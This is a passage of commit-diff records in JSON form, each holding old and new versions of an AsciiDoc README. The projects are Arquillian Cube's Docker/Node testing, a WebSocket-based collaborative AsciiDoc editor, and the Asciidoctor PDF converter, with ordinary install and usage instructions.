javascript]\n.src\/main\/js\/index.js\n----\nvar express = require('express');\n\nvar app = express();\n\napp.get('\/', function(req, res){\n res.send('Hello from inside a container!');\n});\n\napp.listen(8080);\n----\n\nThen we need to define a +DockerfileTemplate+ as we did for +Undertow+.\n\n[source]\n.src\/test\/resources\/node\/DockerfileTemplate\n----\nFROM node:0.11.14\n\nRUN mkdir -p \/usr\/src\/app\nWORKDIR \/usr\/src\/app\n\nADD ${deployableFilename} \/usr\/src\/app #1\nRUN npm install\nEXPOSE 8080\n\nCMD [ \"npm\", \"start\" ]\n----\n<1> We need to use +ADD+ command adding the deployed file instead of +COPY+. We are going to see why below.\n\nFinally the +arquillian.xml+ configuration file.\n\n[source, xml]\n.arquillian.xml\n----\n<?xml version=\"1.0\"?>\n<arquillian xmlns:xsi=\"http:\/\/www.w3.org\/2001\/XMLSchema-instance\"\n xmlns=\"http:\/\/jboss.org\/schema\/arquillian\"\n xsi:schemaLocation=\"http:\/\/jboss.org\/schema\/arquillian\n http:\/\/jboss.org\/schema\/arquillian\/arquillian_1_0.xsd\">\n\n <extension qualifier=\"docker\">\n <property name=\"serverVersion\">1.12<\/property>\n <property name=\"serverUri\">http:\/\/localhost:2375<\/property>\n <property name=\"dockerContainers\">\n node:\n buildImage:\n dockerfileLocation: src\/test\/resources\/node\n noCache: true\n remove: true\n await:\n strategy: polling\n portBindings: [8080\/tcp]\n <\/property>\n <\/extension>\n\n <container qualifier=\"containerless\" default=\"true\">\n <configuration>\n <property name=\"containerlessDocker\">node<\/property> <!--1-->\n <property name=\"embeddedPort\">8080<\/property>\n <\/configuration>\n <\/container>\n\n<\/arquillian>\n----\n<1> This property is used to set which container must be started. In this case +node+.\n\nAnd finally the *Arquillian* test.\n\n[source, java]\n.NodeTest.java\n----\n@RunWith(Arquillian.class)\npublic class NodeTest {\n\n @Deployment(testable = false) \/\/<1>\n public static GenericArchive createDeployment() {\n return ShrinkWrap.create(GenericArchive.class, \"app.tar\") \/\/<2>\n .add(new ClassLoaderAsset(\"index.js\"), \"index.js\")\n .add(new ClassLoaderAsset(\"package.json\"), \"package.json\");\n }\n\n @Test\n public void shouldReturnMessageFromNodeJs(@ArquillianResource URL base) { \/\/<3>\n try (BufferedReader in = new BufferedReader(new InputStreamReader(\n base.openStream()));) {\n String userInput = in.readLine();\n assertThat(userInput, is(\"Hello from inside a container!\"));\n } catch (UnknownHostException e) {\n fail(\"Don't know about host \");\n } catch (IOException e) {\n fail(\"Couldn't get I\/O for the connection to \");\n }\n }\n}\n----\n<1> Tests should be run as-client.\n<2> +GenericArchive+ with +tar+ extension must be created using _Shrinkwrap_.\n<3> Simple test.\n\nNOTE: +GenericArchive+ must end with +tar+ extension because it is expected by *Arquillian Cube*. When you use +ADD+ in +Dockerfile+, _Docker_ will untar automatically the file to given location.\n\n== Future work\n\nAPI will continuously evolve to fit requirements of an enterprise application as well as providing integration with _Kubernates_ and other Docker related tools.\nAlso some configuration parameters will be modified to fix any possible requirements.\nAlthough we are going to try to not break compatibility with previous versions, we cannot guarantee until _beta_ stage.\n\nFeel free to use it and any missing feature, bug or anything you see , feel free to add a new issue.\n","returncode":0,"stderr":"","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"51cf9e0c4b3b5bb5098350ae366c111772b25ace","subject":"Add new features details","message":"Add new features details\n","repos":"mgreau\/when-websocket-met-asciidoctor,mgreau\/when-websocket-met-asciidoctor,mgreau\/when-websocket-met-asciidoctor","old_file":"README.adoc","new_file":"README.adoc","new_contents":"= Real-time collaborative editor for Asciidoc files\nMaxime Greau <https:\/\/github.com\/mgreau[@mgreau]>\n:awestruct-layout: base \n:imagesdir: .\/doc\/img\n:idprefix:\n:idseparator: -\n:online-demo: http:\/\/wildfly-mgreau.rhcloud.com\/ad-editor\n:milestones: https:\/\/github.com\/mgreau\/when-websocket-met-asciidoctor\/issues\/milestones\n:issues: https:\/\/github.com\/mgreau\/when-websocket-met-asciidoctor\/issues\n:asciidoctor-url: http:\/\/asciidoctor.org\n:asciidoctorj-url: https:\/\/github.com\/asciidoctor\/asciidoctorj\n:wildfly-url: http:\/\/download.jboss.org\/wildfly\/8.0.0.CR1\/wildfly-8.0.0.CR1.zip\n\nYou can try the editor online at {online-demo} (running on OpenShift).\n\nThis project gives you the possibility to *work on the same AsciiDoc file with a team*.\n\nIt's based on the {asciidoctor-url}[Asciidoctor project] thanks to the Java API provided by {asciidoctor-url}[AsciidoctorJ].\n\nimage::ad-editor-0.1.0-alpha2.png[Patch feature example]\n\n== 0.1.0-Alpha2 features\n\n* Create a *new space* OR *join others author* with a spaceID\n* *Browser storage* with HTML5 IndexedDB for backup (save and load AsciiDoc source)\n* Fullscreen mode for HTML5 preview\n* Improved UI Design\n* Realtime HTML5 preview : \n** *each key entered* if you have clicked on +Render On Change+\n** *each time you press \"Alt+R\"* if you have clicked on +Render On Alt+R+ button\n* *Patch feature* :\n** if an other author send a version, you can click on +Compute Diff+ button to see differences between your adoc file and the last adoc file\n** if the patch seems ok, click on +Apply Patch+ and you adoc source will be up to date\n\n== Changelog\n\nYou can read all changes between each release in the link:CHANGELOG.adoc[changelog file].\n\n== Roadmap\n\nA lot of cool features are planned :) You can read all {issues}[open and closed issues] and {milestones}[milestones]\n\n== Install on your laptop\n\n[IMPORTANT]\n.Prerequisites\n====\n* JDK 7\n* Apache Maven 3.1\n====\n\n. Clone or download this github project (*+$APP_HOME+*)\n\n. Installing the Java EE 7 Compliance App server \n.. Download {wildfly-url}[WildFly 8.0.0-CR1] (*+$JBOSS_HOME+*)\n.. Then you need to deploy the link:module\/README.adoc[Asciidoctor module] into your WildFly app server\n\n. Installing Bower\n.. Bower depends on Node and npm. It's installed globally using npm:\n \n npm install -g bower\n \n.. Installing the bower dependencies needed by this app\n\n cd $APP_HOME\n bower install\n \n. Build the WAR and test it into WildFly AS with maven\/arquillian : \n\n .. if the environement variable +$JBOSS_HOME+ is set :\n\n mvn clean package -Pwildfly-managed-arquillian\n\n .. if you haven't set the +$JBOSS_HOME+ env variable :\n\n mvn clean package -Pwildfly-managed-arquillian -DserverRoot=<path_to_the_server>\n \n. Deploy the app automatically with maven : \n\n .. if the app server is started\n \n mvn wildfly:deploy -Dmaven.test.skip=true\n \n .. if the app server isn't started\n \n mvn wildfly:run -Dmaven.test.skip=true -Djboss-as.home=<path_to_the_server>\n\n. Launch your browser and enjoy :)\n\n * http:\/\/localhost:8080\/ad-editor\n\n\n== Technology used\n\n* Asciidoctor project\n** AsciidoctorJ 0.1.4\n* Java EE 7 \n** CDI 1.1\n** WebSocket 1.0\n** JSON-P 1.0\n** EJB 3.2\n* Web Client\n** AngularJS 1.2.11\n** Ace Editor\n** Bootstrap 3.0\n* Tests\n** JUnit 4.8\n** Arquillian 1.1.2\n* Java EE 7 Compliance App server\n\n","old_contents":"= Real-time collaborative editor for Asciidoc files\nMaxime Greau <https:\/\/github.com\/mgreau[@mgreau]>\n:awestruct-layout: base \n:imagesdir: .\/doc\/img\n:idprefix:\n:idseparator: -\n:online-demo: http:\/\/wildfly-mgreau.rhcloud.com\/ad-editor\n:milestones: https:\/\/github.com\/mgreau\/when-websocket-met-asciidoctor\/issues\/milestones\n:issues: https:\/\/github.com\/mgreau\/when-websocket-met-asciidoctor\/issues\n:asciidoctor-url: http:\/\/asciidoctor.org\n:asciidoctorj-url: https:\/\/github.com\/asciidoctor\/asciidoctorj\n:wildfly-url: http:\/\/download.jboss.org\/wildfly\/8.0.0.CR1\/wildfly-8.0.0.CR1.zip\n\nYou can try the editor online at {online-demo} (running on OpenShift).\n\nThis project gives you the possibility to *work on the same AsciiDoc file with a team*.\n\nIt's based on the {asciidoctor-url}[Asciidoctor project] thanks to the Java API provided by {asciidoctor-url}[AsciidoctorJ].\n\nimage::patch-demo.png[Patch feature example]\n\n== 0.1.0-Alpha2 features\n\n* By default when you click on +connect+, you are a +*reader*+ :\n** It means that you can see what happens on HTML5 preview but you can't send any source version\n* When you +add a name+ and click to +Enable editor+, you become a +*writer*+ :\n** so you can update the asciidoc source in realtime and automatically view HTML 5 rendered :\n*** *each time you write something* if you have clicked on +Send On Change+\n*** *each time you press \"Ctrl+S\"* if you have clicked on +Send On Ctrl+S+ button\n* You can *patch your file with the latest asciidoc source*:\n** if an other author send a version, you can click on +Compute Diff+ button to see differences between your adoc file and the last adoc file\n** if the patch seems ok, click on +Apply Patch+ and you adoc source will be up to date\n* *Several people can work* on the same doc\n** you can see the number of writers (people who send adoc file)\n** you can see the name of the last author\n** ypu can see the numbr of readers (people who don't send an asciidoc source)\n\n\n\n== Changelog\n\nYou can read all changes between each release in the link:CHANGELOG.adoc[changelog file].\n\n== Roadmap\n\nA lot of cool features are planned :) You can read all {issues}[open and closed issues] and {milestones}[milestones]\n\n\n\n== Install on your laptop\n\n[IMPORTANT]\n.Prerequisites\n====\n* JDK 7\n* Apache Maven 3.1\n====\n\n. Clone or download this github project (*+$APP_HOME+*)\n\n. Installing the Java EE 7 Compliance App server \n.. Download {wildfly-url}[WildFly 8.0.0-CR1] (*+$JBOSS_HOME+*)\n.. Then you need to deploy the link:module\/README.adoc[Asciidoctor module] into your WildFly app server\n\n. Installing Bower\n.. Bower depends on Node and npm. It's installed globally using npm:\n \n npm install -g bower\n cd $APP_HOME\n bower install\n choose AngularJS 2.11\n \n. Build the WAR and test it into WildFly AS with maven\/arquillian : \n\n .. if the environement variable +$JBOSS_HOME+ is set :\n\n mvn clean package -Pwildfly-managed-arquillian\n\n .. if you haven't set the +$JBOSS_HOME+ env variable :\n\n mvn clean package -Pwildfly-managed-arquillian -DserverRoot=<path_to_the_server>\n \n. Deploy the app automatically with maven : \n\n .. if the app server is started\n \n mvn wildfly:deploy -Dmaven.test.skip=true\n \n .. if the app server isn't started\n \n mvn wildfly:run -Djboss-as.home=<path_to_the_server>\n\n. Launch your browser and enjoy :)\n\n * http:\/\/localhost:8080\/ad-editor\n\n\n== Technology used\n\n* Asciidoctor project\n** AsciidoctorJ 0.1.4\n* Java EE 7 \n** CDI 1.1\n** WebSocket 1.0\n** JSON-P 1.0\n** EJB 3.2\n* Web Client\n** AngularJS 1.2.11\n** Ace Editor\n** Bootstrap 3.0\n* Tests\n** JUnit 4.8\n** Arquillian 1.1.2\n* Java EE 7 Compliance App server\n\n","returncode":0,"stderr":"","license":"mit","lang":"AsciiDoc"} {"commit":"4a8ddbf17567aa81dd03a57347a9a03c84c67d04","subject":"explain the asciidoctor-pdf command in more detail","message":"explain the asciidoctor-pdf command in more detail\n","repos":"Hextremist\/asciidoctor-pdf,asciidoctor\/asciidoctor-pdf,dsisnero\/asciidoctor-pdf,asciidoctor\/asciidoctor-pdf,mojavelinux\/asciidoctor-pdf,Hextremist\/asciidoctor-pdf,dsisnero\/asciidoctor-pdf,mojavelinux\/asciidoctor-pdf","old_file":"README.adoc","new_file":"README.adoc","new_contents":"= Asciidoctor PDF: A native PDF converter for AsciiDoc\nDan Allen <https:\/\/github.com\/mojavelinux[@mojavelinux]>; Sarah White <https:\/\/github.com\/graphitefriction[@graphitefriction]>\n\/\/ Settings:\n:compat-mode!:\n:experimental:\n:idprefix:\n:idseparator: -\n:icons: font\nifdef::env-github,env-browser[:outfilesuffix: .adoc]\n:pagenums:\n\/\/:pdf-page-size: [8.25in, 11.69in]\n\/\/:pdf-page-size: A4\nifdef::env-browser[:toc: preamble]\n\/\/ Aliases:\n:project-name: Asciidoctor PDF\n:project-handle: asciidoctor-pdf\n\/\/ URIs:\n\/\/ifdef::env-github[:relfileprefix: \/blob\/master\/]\n:uri-project: https:\/\/github.com\/asciidoctor\/asciidoctor-pdf\n:uri-project-repo: {uri-project}\n:uri-project-issues: {uri-project-repo}\/issues\n:uri-project-list: http:\/\/discuss.asciidoctor.org\n:uri-prawn: http:\/\/prawn.majesticseacreature.com\n:uri-rvm: http:\/\/rvm.io\n:uri-asciidoctor: http:\/\/asciidoctor.org\n\n_Lo and behold_, a native PDF converter for AsciiDoc built with {uri-asciidoctor}[Asciidoctor] and {uri-prawn}[Prawn]! +\n_No more middleman._ +\n_No more DocBook toolchain._ +\nIt's AsciiDoc straight to PDF!\n\n[caption=Status]\nCAUTION: {project-name} is currently _alpha_ software.\nWhile the converter handles most AsciiDoc content, there's still work needed to fill in gaps where conversion is incomplete, incorrect or not implemented.\nSee the milestone v1.5.0 in the {uri-project-issues}[issue tracker] for details.\n\n== Prawn, the majestic PDF generator\n\n{uri-project}[{project-name}] is made possible by an amazing Ruby gem named Prawn.\nAnd what a gem it is!\n\n{uri-prawn}[Prawn] is a nimble PDF writer for Ruby.\nMore important, it's a hackable platform that offers both high level APIs for the most common needs and low level APIs for bending the document model to accommodate special circumstances.\n\nWith Prawn, you can write text, draw lines and shapes and place images _anywhere_ on the page and add as much color as you like.\nIn addition, it brings a fluent API and aggressive code re-use to the printable document space.\n\nHere's an example that demonstrates how to use Prawn to create a basic PDF document.\n\n.Create a basic PDF document using Prawn\n[source,ruby]\n----\nrequire 'prawn'\n\nPrawn::Document.generate 'output.pdf' do\n text 'Hello, PDF creation!'\nend\n----\n\nIt's that easy.\nAnd that's just the beginning.\nSkip ahead to <<getting-started,Getting started>> to start putting it use.\n\nPrawn is the _killer library_ for PDF generation we've needed to close this critical gap in Asciidoctor.\nIt absolutely takes the pain out of creating printable documents.\nPicking up from there, {project-name} takes the pain out of creating PDF documents _from AsciiDoc_.\n\n== Features\n\n=== Notable features\n\n* Direct AsciiDoc to PDF conversion\n* <<docs\/theming-guide.adoc#,Configuration-driven style and layout>>\n* PDF document outline (i.e., bookmarks)\n* Table of contents page(s)\n* Document metadata (title, authors, subject, keywords, etc)\n* Internal cross reference links\n* Syntax highlighting with CodeRay or Pygments\n* Page numbering\n* Customizable running content (header and footer)\n* \u201cKeep together\u201d blocks (i.e., page breaks avoided in certain block content)\n* Orphan section titles avoided\n* Table border settings honored\n* Font-based icons\n* Custom fonts\n\n=== Missing features\n\nSee <<WORKLOG.adoc#,WORKLOG>>.\n\n== Prerequisites\n\nAll that's needed is Ruby (1.9.3 or above; 2.2.x recommended) and a few Ruby gems, which we explain how to install in the next section.\n\n[WARNING]\n====\nPrawn 2.0.0 and above requires Ruby >= 2.0.0 at installation (though it still works with Ruby 1.9.3 once you get beyond installation).\nIf you need to use Asciidoctor PDF with Ruby 1.9.3, you must first install Prawn 1.3.0 using:\n\n $ gem install prawn --version 1.3.0\n\nYou can then proceed with installation of Asciidoctor PDF.\n====\n\nTo check you have Ruby available, use the `ruby` command to query the version installed:\n\n $ ruby --version\n\n== Getting started\n\nYou can get {project-name} by <<install-the-published-gem,installing the published gem>> or <<development,running the code from source>>.\n\n=== Install the published gem\n\n{project-name} is published in pre-release on RubyGems.org.\nYou can install the published gem using the following command:\n\n $ gem install --pre asciidoctor-pdf\n \nIf you want to syntax highlight source listings, you'll also want to install CodeRay, Rouge or Pygments.\nChoose one (or more) of the following:\n\n.CodeRay\n $ gem install coderay\n\n.Rouge\n $ gem install rouge\n\n.Pygments\n $ gem install pygments.rb\n \nYou then activate syntax highlighting for a given document by adding the following attribute to the document header (CodeRay shown):\n\n[source,asciidoc]\n----\n:source-highlighter: coderay \n----\n\nAssuming all the required gems install properly, verify you can run the `asciidoctor-pdf` script:\n\n $ asciidoctor-pdf -v\n\nIf you see the version of {project-name} printed, you're ready to use {project-name}.\n\nLet's grab an AsciiDoc document to distill and start putting {project-name} to use!\n\n=== An example AsciiDoc document\n\nIf you don't already have an AsciiDoc document, you can use the [file]_basic-example.adoc_ file found in the examples directory of this project.\n\nifeval::[{safe-mode-level} >= 20]\nSee <<examples\/basic-example.adoc#,basic-example.adoc>>.\nendif::[]\nifeval::[{safe-mode-level} < 20]\n.basic-example.adoc\n[source,asciidoc]\n....\ninclude::examples\/basic-example.adoc[]\n....\nendif::[]\n\nIt's time to convert the AsciiDoc document directly to PDF.\n\n=== Convert AsciiDoc to PDF\n\nIMPORTANT: You'll need the `coderay` gem installed to run this example since it uses the `source-highlighter` attribute with the value of `coderay`.\n\nConverting to PDF is a simple as running the `asciidoctor-pdf` script using Ruby and passing our AsciiDoc document as the first argument.\n\n $ asciidoctor-pdf basic-example.adoc\n\nThis command is just a shorthand way of running:\n\n $ asciidoctor -r asciidoctor-pdf -b pdf basic-example.adoc\n\nThe `asciidoctor-pdf` command just saves you from having to remember all those flags.\nThat's why we created it.\n\nWhen the script completes, you should see the file [file]_basic-example.pdf_ in the same directory.\nOpen the [file]_basic-example.pdf_ file with a PDF viewer to see the result.\n\n.Example PDF document rendered in a PDF viewer\nimage::examples\/example-pdf-screenshot.png[Screenshot of PDF document,width=800,scaledwidth=100%]\n\nYou're also encouraged to try converting this <<README#,README>> as well as the documents in the examples directory to see more of what {project-name} can do.\n\nThe pain of the DocBook toolchain should be melting away about now.\n\n== Themes\n\nThe layout and styling of the PDF is driven by a YAML configuration file.\nTo learn how the theming system works and how to create and apply custom themes, refer to the <<docs\/theming-guide.adoc#,Asciidoctor PDF Theme Guide>>.\nYou can use the built-in theme files, which you can find in the [file]_data\/themes_ directory, as examples.\n\n== Font-based Icons\n\nYou can use icons in your PDF document using any of the following icon sets:\n\n* *fa* - https:\/\/fortawesome.github.io\/Font-Awesome\/[Font Awesome^] (default)\n* *octicon* - https:\/\/octicons.github.com\/[Octicons^]\n* *fi* - http:\/\/zurb.com\/playground\/foundation-icon-fonts-3[Foundation Icons^]\n* *pf* - http:\/\/paymentfont.io\/[Payment font^]\n\nYou can enable font-based icons by setting the following attribute in the header of your document:\n\n[source,asciidoc]\n----\n:icons: font\n----\n\nIf you want to override the font set globally, also set the `icon-set` attribute:\n\n[source,asciidoc]\n----\n:icons: font\n:icon-set: pf\n----\n\nHere's an example that shows how to use the Amazon icon from the payment font (pf) icon set in a sentence:\n\n[source,asciidoc]\n----\nAvailable now at icon:amazon[].\n----\n\nYou can use the `set` attribute on the icon macro to override the icon set for a given icon.\n\n[source,asciidoc]\n----\nAvailable now at icon:amazon[set=pf].\n----\n\nIn addition to the sizes supported in the HTML backend (lg, 1x, 2x, etc), you can enter any relative value in the size attribute (e.g., 1.5em, 150%, etc).\n\n[source,asciidoc]\n----\nicon:android[size=40em]\n----\n\nYou can enable use of fonts during PDF generation (instead of in the document header) by passing the `icons` attribute to the `asciidoctor-pdf` command.\n\n $ asciidoctor-pdf -a icons=font -a icon-set=octicon sample.adoc\n\nIcon-based fonts are handled by the `prawn-icon` gem.\nTo find a complete list of available icons, consult the https:\/\/github.com\/jessedoyle\/prawn-icon\/tree\/master\/data\/fonts[prawn-icon] repository.\n\n== Optional scripts\n\n{project-name} also provides a shell script that invokes GhostScript (`gs`) to optimize and compress the generated PDF with minimal impact on quality.\nYou must have Ghostscript installed to use it.\n\nHere's an example usage:\n\n $ .\/bin\/optimize-pdf basic-example.pdf\n\nThe command will generate the file [file]_example-optimized.pdf_ in the current directory.\n\nWARNING: The `optimize-pdf` script currently requires a Bash shell (Linux, OSX, etc).\nWe plan to rewrite the script in Ruby so it works across platforms (see https:\/\/github.com\/asciidoctor\/asciidoctor-pdf\/issues\/1[issue #1])\n\nIMPORTANT: The `optimize-pdf` script relies on Ghostscript >= 9.10.\nOtherwise, it may actually make the PDF larger.\nAlso, you should only consider using it if the file size of the original PDF is > 5MB.\n\nIf a file is found with the extension `.pdfmarks` and the same rootname as the input file, it is used to add metadata to the generated PDF document.\nThis file is necessary to preserve the document metadata since Ghostscript will otherwise drop it.\nThat's why {project-name} always creates this file in addition to the PDF.\n\n== Contributing\n\nIn the spirit of free software, _everyone_ is encouraged to help improve this project.\n\nTo contribute code, simply fork the project on GitHub, hack away and send a pull request with your proposed changes.\n\nFeel free to use the {uri-project-issues}[issue tracker] or {uri-project-list}[Asciidoctor mailing list] to provide feedback or suggestions in other ways.\n\n== Development\n\nTo help develop {project-name}, or to simply use the development version, you need to get the source from GitHub.\nFollow the instructions below to learn how to clone the source and run it from your local copy.\n\n=== Retrieve the source code\n\nYou can retrieve the source of {project-name} in one of two ways:\n\n. Clone the git repository\n. Download a zip archive of the repository\n\n==== Option 1: Fetch using git clone\n\nIf you want to clone the git repository, simply copy the {uri-project-repo}[GitHub repository URL] and pass it to `git clone` command:\n\n $ git clone https:\/\/github.com\/asciidoctor\/asciidoctor-pdf\n\nNext, change to the project directory:\n\n $ cd asciidoctor-pdf\n\n==== Option 2: Download the archive\n\nIf you want to download a zip archive, click the btn:[Download Zip] button on the right-hand side of the repository page on GitHub.\nOnce the download finishes, extract the archive, open a console and change to that directory.\n\nTIP: Instead of working out of the {project-handle} directory, you can simply add the absolute path of the [path]_bin_ directory to your `PATH` environment variable.\n\nWe'll leverage the project configuration to install the necessary dependencies.\n\n=== Install dependencies\n\nIf you're using {uri-rvm}[RVM], we recommend creating a new gemset to work with {project-name}:\n\n $ rvm use 2.2@asciidoctor-pdf --create\n\nWe like RVM because it keeps the dependencies required by various projects isolated.\n\nThe dependencies needed to use {project-name} are defined in the [file]_Gemfile_ at the root of the project.\nWe can use Bundler to install the dependencies for us.\n\nTo check you have Bundler available, use the `bundle` command to query the version installed:\n\n $ bundle --version\n\nIf it's not installed, use the `gem` command to install it.\n\n $ gem install bundler\n\nThen use the `bundle` command to install the project dependencies:\n\n $ bundle\n\nNOTE: You need to call `bundle` from the project directory so that it can find the [file]_Gemfile_.\n\nAssuming all the required gems install properly, verify you can run the `asciidoctor-pdf` script using Ruby:\n\n $ ruby .\/bin\/asciidoctor-pdf -v\n\nor\n\n $ bundle exec .\/bin\/asciidoctor-pdf -v\n\nIf you see the version of {project-name} printed, you're ready to use {project-name}!\n\nCAUTION: If you get an error message--and you're not using a Ruby manager like RVM--you may need to invoke the script through `bundle exec`:\nFor best results, be sure to always use `bundle exec` whenever invoking the `.\/bin\/asciidoctor-pdf` script in development mode.\n\n[[resources,Links]]\n== Resources\n\n* https:\/\/groups.google.com\/forum\/#!msg\/prawn-ruby\/MbMsCx862iY\/6ImCsvLGfVcJ[Discussion about image quality in PDFs]\n\n== Authors\n\n{project-name} was written by https:\/\/github.com\/mojavelinux[Dan Allen] and https:\/\/github.com\/graphitefriction[Sarah White] of OpenDevise Inc. on behalf of the Asciidoctor Project.\n\n== Copyright\n\nCopyright (C) 2014-2015 OpenDevise Inc. and the Asciidoctor Project.\nFree use of this software is granted under the terms of the MIT License.\n\nFor the full text of the license, see the <<LICENSE.adoc#,LICENSE>> file.\nRefer to the <<NOTICE.adoc#,NOTICE>> file for information about third-party Open Source software in use.\n","old_contents":"= Asciidoctor PDF: A native PDF converter for AsciiDoc\nDan Allen <https:\/\/github.com\/mojavelinux[@mojavelinux]>; Sarah White <https:\/\/github.com\/graphitefriction[@graphitefriction]>\n\/\/ Settings:\n:compat-mode!:\n:experimental:\n:idprefix:\n:idseparator: -\n:icons: font\nifdef::env-github,env-browser[:outfilesuffix: .adoc]\n:pagenums:\n\/\/:pdf-page-size: [8.25in, 11.69in]\n\/\/:pdf-page-size: A4\nifdef::env-browser[:toc: preamble]\n\/\/ Aliases:\n:project-name: Asciidoctor PDF\n:project-handle: asciidoctor-pdf\n\/\/ URIs:\n\/\/ifdef::env-github[:relfileprefix: \/blob\/master\/]\n:uri-project: https:\/\/github.com\/asciidoctor\/asciidoctor-pdf\n:uri-project-repo: {uri-project}\n:uri-project-issues: {uri-project-repo}\/issues\n:uri-project-list: http:\/\/discuss.asciidoctor.org\n:uri-prawn: http:\/\/prawn.majesticseacreature.com\n:uri-rvm: http:\/\/rvm.io\n:uri-asciidoctor: http:\/\/asciidoctor.org\n\n_Lo and behold_, a native PDF converter for AsciiDoc built with {uri-asciidoctor}[Asciidoctor] and {uri-prawn}[Prawn]! +\n_No more middleman._ +\n_No more DocBook toolchain._ +\nIt's AsciiDoc straight to PDF!\n\n[caption=Status]\nCAUTION: {project-name} is currently _alpha_ software.\nWhile the converter handles most AsciiDoc content, there's still work needed to fill in gaps where conversion is incomplete, incorrect or not implemented.\nSee the milestone v1.5.0 in the {uri-project-issues}[issue tracker] for details.\n\n== Prawn, the majestic PDF generator\n\n{uri-project}[{project-name}] is made possible by an amazing Ruby gem named Prawn.\nAnd what a gem it is!\n\n{uri-prawn}[Prawn] is a nimble PDF writer for Ruby.\nMore important, it's a hackable platform that offers both high level APIs for the most common needs and low level APIs for bending the document model to accommodate special circumstances.\n\nWith Prawn, you can write text, draw lines and shapes and place images _anywhere_ on the page and add as much color as you like.\nIn addition, it brings a fluent API and aggressive code re-use to the printable document space.\n\nHere's an example that demonstrates how to use Prawn to create a basic PDF document.\n\n.Create a basic PDF document using Prawn\n[source,ruby]\n----\nrequire 'prawn'\n\nPrawn::Document.generate 'output.pdf' do\n text 'Hello, PDF creation!'\nend\n----\n\nIt's that easy.\nAnd that's just the beginning.\nSkip ahead to <<getting-started,Getting started>> to start putting it use.\n\nPrawn is the _killer library_ for PDF generation we've needed to close this critical gap in Asciidoctor.\nIt absolutely takes the pain out of creating printable documents.\nPicking up from there, {project-name} takes the pain out of creating PDF documents _from AsciiDoc_.\n\n== Features\n\n=== Notable features\n\n* Direct AsciiDoc to PDF conversion\n* <<docs\/theming-guide.adoc#,Configuration-driven style and layout>>\n* PDF document outline (i.e., bookmarks)\n* Table of contents page(s)\n* Document metadata (title, authors, subject, keywords, etc)\n* Internal cross reference links\n* Syntax highlighting with CodeRay or Pygments\n* Page numbering\n* Customizable running content (header and footer)\n* \u201cKeep together\u201d blocks (i.e., page breaks avoided in certain block content)\n* Orphan section titles avoided\n* Table border settings honored\n* Font-based icons\n* Custom fonts\n\n=== Missing features\n\nSee <<WORKLOG.adoc#,WORKLOG>>.\n\n== Prerequisites\n\nAll that's needed is Ruby (1.9.3 or above; 2.2.x recommended) and a few Ruby gems, which we explain how to install in the next section.\n\n[WARNING]\n====\nPrawn 2.0.0 and above requires Ruby >= 2.0.0 at installation (though it still works with Ruby 1.9.3 once you get beyond installation).\nIf you need to use Asciidoctor PDF with Ruby 1.9.3, you must first install Prawn 1.3.0 using:\n\n $ gem install prawn --version 1.3.0\n\nYou can then proceed with installation of Asciidoctor PDF.\n====\n\nTo check you have Ruby available, use the `ruby` command to query the version installed:\n\n $ ruby --version\n\n== Getting started\n\nYou can get {project-name} by <<install-the-published-gem,installing the published gem>> or <<development,running the code from source>>.\n\n=== Install the published gem\n\n{project-name} is published in pre-release on RubyGems.org.\nYou can install the published gem using the following command:\n\n $ gem install --pre asciidoctor-pdf\n \nIf you want to syntax highlight source listings, you'll also want to install CodeRay, Rouge or Pygments.\nChoose one (or more) of the following:\n\n.CodeRay\n $ gem install coderay\n\n.Rouge\n $ gem install rouge\n\n.Pygments\n $ gem install pygments.rb\n \nYou then activate syntax highlighting for a given document by adding the following attribute to the document header (CodeRay shown):\n\n[source,asciidoc]\n----\n:source-highlighter: coderay \n----\n\nAssuming all the required gems install properly, verify you can run the `asciidoctor-pdf` script:\n\n $ asciidoctor-pdf -v\n\nIf you see the version of {project-name} printed, you're ready to use {project-name}.\n\nLet's grab an AsciiDoc document to distill and start putting {project-name} to use!\n\n=== An example AsciiDoc document\n\nIf you don't already have an AsciiDoc document, you can use the [file]_basic-example.adoc_ file found in the examples directory of this project.\n\nifeval::[{safe-mode-level} >= 20]\nSee <<examples\/basic-example.adoc#,basic-example.adoc>>.\nendif::[]\nifeval::[{safe-mode-level} < 20]\n.basic-example.adoc\n[source,asciidoc]\n....\ninclude::examples\/basic-example.adoc[]\n....\nendif::[]\n\nIt's time to convert the AsciiDoc document directly to PDF.\n\n=== Convert AsciiDoc to PDF\n\nIMPORTANT: You'll need the `coderay` gem installed to run this example since it uses the `source-highlighter` attribute with the value of `coderay`.\n\nConverting to PDF is a simple as running the `asciidoctor-pdf` script using Ruby and passing our AsciiDoc document as the first argument.\n\n $ asciidoctor-pdf basic-example.adoc\n\nThis command is just a shorthand way of running:\n\n $ asciidoctor -r asciidoctor-pdf -b pdf basic-example.adoc\n\nWhen the script completes, you should see the file [file]_basic-example.pdf_ in the same directory.\nOpen the [file]_basic-example.pdf_ file with a PDF viewer to see the result.\n\n.Example PDF document rendered in a PDF viewer\nimage::examples\/example-pdf-screenshot.png[Screenshot of PDF document,width=800,scaledwidth=100%]\n\nYou're also encouraged to try converting this <<README#,README>> as well as the documents in the examples directory to see more of what {project-name} can do.\n\nThe pain of the DocBook toolchain should be melting away about now.\n\n== Themes\n\nThe layout and styling of the PDF is driven by a YAML configuration file.\nTo learn how the theming system works and how to create and apply custom themes, refer to the <<docs\/theming-guide.adoc#,Asciidoctor PDF Theme Guide>>.\nYou can use the built-in theme files, which you can find in the [file]_data\/themes_ directory, as examples.\n\n== Font-based Icons\n\nYou can use icons in your PDF document using any of the following icon sets:\n\n* *fa* - https:\/\/fortawesome.github.io\/Font-Awesome\/[Font Awesome^] (default)\n* *octicon* - https:\/\/octicons.github.com\/[Octicons^]\n* *fi* - http:\/\/zurb.com\/playground\/foundation-icon-fonts-3[Foundation Icons^]\n* *pf* - http:\/\/paymentfont.io\/[Payment font^]\n\nYou can enable font-based icons by setting the following attribute in the header of your document:\n\n[source,asciidoc]\n----\n:icons: font\n----\n\nIf you want to override the font set globally, also set the `icon-set` attribute:\n\n[source,asciidoc]\n----\n:icons: font\n:icon-set: pf\n----\n\nHere's an example that shows how to use the Amazon icon from the payment font (pf) icon set in a sentence:\n\n[source,asciidoc]\n----\nAvailable now at icon:amazon[].\n----\n\nYou can use the `set` attribute on the icon macro to override the icon set for a given icon.\n\n[source,asciidoc]\n----\nAvailable now at icon:amazon[set=pf].\n----\n\nIn addition to the sizes supported in the HTML backend (lg, 1x, 2x, etc), you can enter any relative value in the size attribute (e.g., 1.5em, 150%, etc).\n\n[source,asciidoc]\n----\nicon:android[size=40em]\n----\n\nYou can enable use of fonts during PDF generation (instead of in the document header) by passing the 